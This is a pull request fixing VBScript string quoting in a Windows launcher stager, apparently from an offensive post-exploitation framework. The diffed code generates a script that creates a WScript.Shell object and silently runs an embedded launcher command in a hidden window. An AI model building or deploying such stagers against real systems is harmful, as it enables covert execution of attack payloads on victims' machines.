### PR TITLE
Replaces single quotes in vbscript with double.

### DIFF
--- a/lib/stagers/windows/launcher_vbs.py
+++ b/lib/stagers/windows/launcher_vbs.py
@@ -103,7 +103,7 @@ class Stager:
         else:
             code = "Dim objShell\n"
             code += "Set objShell = WScript.CreateObject(\"WScript.Shell\")\n"
-            code += "command = '"+launcher.replace("'", "\\'")+"'\n"
+            code += "command = \""+launcher.replace("'", "\\'")+"\"\n"
             code += "objShell.Run command,0\n"
             code += "Set objShell = Nothing\n"
 


### PR DESCRIPTION
String literals in VBScript require double-quotes. There may be other places in the codebase where this is an issue.